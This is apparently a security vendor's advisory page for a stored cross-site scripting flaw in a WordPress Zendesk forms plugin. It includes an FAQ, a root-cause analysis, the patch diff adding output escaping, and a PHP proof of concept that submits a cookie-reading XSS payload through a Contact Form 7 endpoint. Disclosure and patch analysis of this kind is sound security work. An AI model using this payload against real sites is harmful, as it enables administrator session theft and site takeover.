What is CVE-2026-2568?

CVE-2026-2568 is a stored cross-site scripting (XSS) vulnerability in the WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable, and Ninja Forms plugin for WordPress. It affects versions up to and including 1.1.5, allowing unauthenticated attackers to inject malicious scripts via form submissions.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping when displaying form submission data in the plugin’s admin log. Attackers can submit crafted payloads through any integrated form, which are then stored and executed when an administrator views the log.

Who is affected by this vulnerability?

Any WordPress site using the WP Zendesk plugin versions 1.1.5 or earlier is at risk. Administrators who access the plugin’s log page are particularly vulnerable, as they may unknowingly execute malicious scripts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the WP Zendesk plugin installed. If it is version 1.1.5 or earlier, your site is susceptible to this vulnerability.

How can I fix CVE-2026-2568?

The vulnerability is patched in version 1.1.6 of the WP Zendesk plugin. Update your plugin to this version or later to mitigate the risk of exploitation.

What does a CVSS score of 7.2 indicate?

A CVSS score of 7.2 is classified as ‘High’ severity, indicating that the vulnerability poses a significant risk. This suggests that successful exploitation could lead to serious consequences, such as unauthorized access or data theft.

What is stored cross-site scripting (XSS)?

Stored XSS is a type of vulnerability where an attacker injects malicious scripts that are stored on the server and executed in the browser of users who access the affected page. This can lead to session hijacking, data theft, and other security breaches.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an attacker can submit a payload through a vulnerable form, which gets stored in the database. When an administrator views the log, the payload executes, demonstrating the potential impact of the vulnerability.

What are the risks of not addressing this vulnerability?

Failing to address CVE-2026-2568 can lead to unauthorized script execution in the context of an administrator’s session. This could result in site takeover, data breaches, or the injection of further malicious content.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing a web application firewall (WAF), regularly auditing plugins for vulnerabilities, and educating users about safe browsing practices to further protect your WordPress site.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin or restricting access to the admin log page until the plugin can be updated. Additionally, monitor logs for any suspicious activity.

Where can I find more information about this vulnerability?

More information about CVE-2026-2568 can be found on the National Vulnerability Database (NVD) and security advisories from the plugin developers. Keeping abreast of security updates and best practices is essential for WordPress administrators.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-2568: WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.5 – Unauthenticated Stored Cross-Site Scripting (cf7-zendesk)

CVE ID CVE-2026-2568

Plugin cf7-zendesk

Severity High (CVSS 7.2)

CWE 79

Vulnerable Version 1.1.5

Patched Version 1.1.6

Disclosed March 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2568:
The vulnerability is a stored cross-site scripting (XSS) flaw in the WP Zendesk plugin for WordPress versions up to 1.1.5. The root cause is insufficient output escaping when rendering form submission data in the plugin’s admin log viewer. The vulnerable code is in the file `cf7-zendesk/templates/log.php`. The plugin’s `vxcf_zendesk` class processes form submissions and stores entry data. This data is later displayed in the admin panel via the `log.php` template. In the vulnerable version, line 31 outputs the `$value` variable directly without escaping: `echo is_array($value) ? json_encode($value) : $value`. This allows arbitrary HTML and JavaScript embedded in a form field value to be rendered and executed when an administrator views the log page.

The attack vector is an unauthenticated form submission. An attacker can submit a crafted payload via any form integrated with the plugin (Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms). The payload is stored in the plugin’s log database. When a user with administrative privileges accesses the plugin’s log page (`wp-admin/admin.php?page=vxcf_zendesk_log`), the malicious script executes in their browser session. This can lead to site takeover, data theft, or further malware injection.

The patch in version 1.1.6 adds proper output escaping. The diff changes line 31 to: `echo is_array($value) ? esc_html(json_encode($value)) : esc_html($value)`. The `esc_html()` function ensures any HTML entities are encoded before output, neutralizing the XSS payload. The patch also includes a refactoring of the `process_tags` method to properly handle array values, but the primary security fix is the escaping in the template. If exploited, this vulnerability allows unauthenticated attackers to inject persistent malicious scripts that execute in the context of an administrator, compromising the WordPress site.

Differential between vulnerable and patched code

Code Diff

--- a/cf7-zendesk/cf7-zendesk.php
+++ b/cf7-zendesk/cf7-zendesk.php
@@ -2,7 +2,7 @@
 /**
 * Plugin Name: Contact Form 7 Zendesk
 * Description: Integrates Contact Form 7, <a href="https://wordpress.org/plugins/contact-form-entries/">Contact Form Entries Plugin</a> and many other forms with Zendesk allowing form submissions to be automatically sent to your Zendesk account
-* Version: 1.1.5
+* Version: 1.1.6
 * Requires at least: 3.8
 * Author URI: https://www.crmperks.com
 * Plugin URI: https://www.crmperks.com/plugins/contact-form-plugins/contact-form-zendesk-plugin/
@@ -24,7 +24,7 @@
   public  $crm_name = "zendesk";
   public  $id = "vxcf_zendesk";
   public  $domain = "vxcf-zendesk";
-  public  $version = "1.1.5";
+  public  $version = "1.1.6";
   public  $update_id = "6000015";
   public  $min_cf_version = "1.0";
   public $type = "vxcf_zendesk";
@@ -108,18 +108,7 @@
   add_action('init', array($this,'init'));
        //loading translations
 load_plugin_textdomain('contact-form-zendesk-crm', FALSE,  $this->plugin_dir_name(). '/languages/' );
-
-  self::$db_version=get_option($this->type."_version");
-  if(self::$db_version != $this->version && current_user_can( 'manage_options' )){
-  $data=$this->get_data_object();
-  $data->update_table();
-  update_option($this->type."_version", $this->version);
-  //add post permissions
-  require_once(self::$path . "includes/install.php");
-  $install=new vxcf_zendesk_install();
-  $install->create_roles();
-
-  }
+$this->maybe_install(true);
 }

   }
@@ -139,6 +128,31 @@
 self::$plugin->instance();
 }
 } }
+  /**
+  * create tables and roles
+  *
+  */
+public function maybe_install($version_check=false){
+
+  if(current_user_can( 'manage_options' )){
+  self::$db_version=get_option($this->type."_version");
+     $do_install=false;
+      if($version_check == false){
+        $do_install=true;
+      }else if(self::$db_version != $this->version){
+        $do_install=true;
+      }
+  if($do_install){
+  $data=$this->get_data_object();
+  $data->update_table();
+  update_option($this->type."_version", $this->version);
+  //add post permissions
+  require_once(self::$path . "includes/install.php");
+  $install=new vxcf_zendesk_install();
+  $install->create_roles();
+  }
+  }
+}

 public function form_submitted($form){

@@ -208,18 +222,17 @@
   $val=$uploaded_files[$name];
    }

-   if( !empty($val) && isset($v['basetype']) && $v['basetype'] == 'mfile' && function_exists('dnd_get_upload_dir') ){
+  if( !empty($val) && isset($v['basetype']) && $v['basetype'] == 'mfile' && function_exists('dnd_get_upload_dir') ){
       $dir=dnd_get_upload_dir();
      $f_arr=array();
       foreach($val as $file){
-     $file_name=explode('/',$file);
+     $file_name=explode('/',$file);
      if(count($file_name)>1){
-      $f_arr[]=$dir['upload_url'].'/'.$file_name[1];
+      $f_arr[]=$dir['upload_url'].'/'.end($file_name);
      }
-      }
-
+      }
    $val=$f_arr;
-   }
+   }
     if(!isset($uploaded_files[$name])){
      $val=wp_unslash($val);
     }
@@ -500,27 +513,6 @@
   }


-  /**
-  * create tables and roles
-  *
-  */
-  public function install(){
-
-  if(current_user_can( 'manage_options' )){
-  self::$db_version=get_option($this->type."_version");
-  if(self::$db_version != $this->version){
-  $data=$this->get_data_object();
-  $data->update_table();
-  update_option($this->type."_version", $this->version);
-  //add post permissions
-  require_once(self::$path . "includes/install.php");
-  $install=new vxcf_zendesk_install();
-  $install->create_roles();
-
-  }
-
-  }
-  }
 /**
 * Contact Form status
 *
@@ -1268,6 +1260,7 @@
   */
   public function activate(){
 $this->plugin_api(true);
+$this->maybe_install();
 do_action('plugin_status_'.$this->type,'activate');
   }
     /**
@@ -1775,16 +1768,7 @@
   if(!empty($v)){ //if value not empty
       if($this->post('type',$v) == "value"){ //custom value
       $value=trim($this->post('value',$v));
-  //starts with { and ends } , any char in brackets except {
-  preg_match_all('/{[^{]+}/',$value,$matches);
-  if(!empty($matches[0])){
-      $vals=array();
-   foreach($matches[0] as $m){
-       $m=trim($m,'{}');
-    $vals['{'.$m.'}']=$this->verify_field_val($entry,$m);
-   }
-  $value=str_replace(array_keys($vals),array_values($vals),$value);
-  }
+$value=$this->process_tags($entry,$value);

   }else{ //general field
   $field=$this->post('field',$v);
@@ -1941,6 +1925,22 @@
 }
   return array("msg"=>$notice,"class"=>$screen_msg_class);
 }
+  public function process_tags($entry,$value){
+  //starts with { and ends } , any char in brackets except {
+  preg_match_all('/{[^{]+}/',$value,$matches);
+  if(!empty($matches[0])){
+      $vals=array();
+   foreach($matches[0] as $m){
+       $m=trim($m,'{}');
+   $val_cust=$this->verify_field_val($entry,$m);
+   if(is_array($val_cust)){ $val_cust=trim(implode(' ',$val_cust)); }
+   $vals['{'.$m.'}']=$val_cust;
+   }
+
+  $value=str_replace(array_keys($vals),array_values($vals),$value);
+  }
+  return $value;
+}

   /**
   * Send error email
--- a/cf7-zendesk/templates/log.php
+++ b/cf7-zendesk/templates/log.php
@@ -28,7 +28,7 @@
 ?>
 <div class="entry_row">
 <div class="entry_col1 vx_label"><span title="<?php echo esc_attr($k) ?>"><?php echo esc_html($label); ?></span></div>
-<div class="entry_col2"><?php  echo is_array($value) ? json_encode($value) : $value ?></div>
+<div class="entry_col2"><?php  echo is_array($value) ? esc_html(json_encode($value)) : esc_html($value) ?></div>
 <div class="crm_clear"></div>
 </div>
 <?php

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2568 - WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.5 - Unauthenticated Stored Cross-Site Scripting
<?php
$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
// This PoC assumes a Contact Form 7 form is present and integrated with the vulnerable plugin.
// The form ID must be known. Replace '123' with the actual form ID.
$form_id = 123;
// Craft a payload that will be stored and executed in the admin log.
$payload = '<img src=x onerror=alert(document.cookie)>';
// Target the WordPress front-end form submission handler.
$submit_url = $target_url . '/wp-json/contact-form-7/v1/contact-forms/' . $form_id . '/feedback';
// Alternatively, if REST API is disabled, target the form's POST endpoint directly.
// $submit_url = $target_url . '/?wpcf7-form=' . $form_id;
$data = array(
    'your-email' => 'attacker@example.com',
    'your-message' => $payload, // Inject payload into a text field.
    '_wpcf7' => $form_id,
    '_wpcf7_version' => '5.7',
    '_wpcf7_locale' => 'en_US',
    '_wpcf7_unit_tag' => 'wpcf7-f' . $form_id . '-p1-o1',
    '_wpcf7_container_post' => '0'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
    echo "Payload submitted. Check admin log at: " . $target_url . "/wp-admin/admin.php?page=vxcf_zendesk_logn";
} else {
    echo "Submission failed. HTTP code: $http_coden";
}
?>

Frequently Asked Questions

What is CVE-2026-2568?
Overview of the vulnerability
CVE-2026-2568 is a stored cross-site scripting (XSS) vulnerability in the WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable, and Ninja Forms plugin for WordPress. It affects versions up to and including 1.1.5, allowing unauthenticated attackers to inject malicious scripts via form submissions.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping when displaying form submission data in the plugin’s admin log. Attackers can submit crafted payloads through any integrated form, which are then stored and executed when an administrator views the log.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP Zendesk plugin versions 1.1.5 or earlier is at risk. Administrators who access the plugin’s log page are particularly vulnerable, as they may unknowingly execute malicious scripts.
How can I check if my site is vulnerable?
Steps for verification
To determine if your site is vulnerable, check the version of the WP Zendesk plugin installed. If it is version 1.1.5 or earlier, your site is susceptible to this vulnerability.
How can I fix CVE-2026-2568?
Mitigation steps
The vulnerability is patched in version 1.1.6 of the WP Zendesk plugin. Update your plugin to this version or later to mitigate the risk of exploitation.
What does a CVSS score of 7.2 indicate?
Understanding severity levels
A CVSS score of 7.2 is classified as ‘High’ severity, indicating that the vulnerability poses a significant risk. This suggests that successful exploitation could lead to serious consequences, such as unauthorized access or data theft.
What is stored cross-site scripting (XSS)?
Definition and implications
Stored XSS is a type of vulnerability where an attacker injects malicious scripts that are stored on the server and executed in the browser of users who access the affected page. This can lead to session hijacking, data theft, and other security breaches.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an attacker can submit a payload through a vulnerable form, which gets stored in the database. When an administrator views the log, the payload executes, demonstrating the potential impact of the vulnerability.
What are the risks of not addressing this vulnerability?
Consequences of inaction
Failing to address CVE-2026-2568 can lead to unauthorized script execution in the context of an administrator’s session. This could result in site takeover, data breaches, or the injection of further malicious content.
Are there any additional security measures I should take?
Enhancing overall site security
In addition to updating the plugin, consider implementing a web application firewall (WAF), regularly auditing plugins for vulnerabilities, and educating users about safe browsing practices to further protect your WordPress site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin or restricting access to the admin log page until the plugin can be updated. Additionally, monitor logs for any suspicious activity.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-2568 can be found on the National Vulnerability Database (NVD) and security advisories from the plugin developers. Keeping abreast of security updates and best practices is essential for WordPress administrators.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations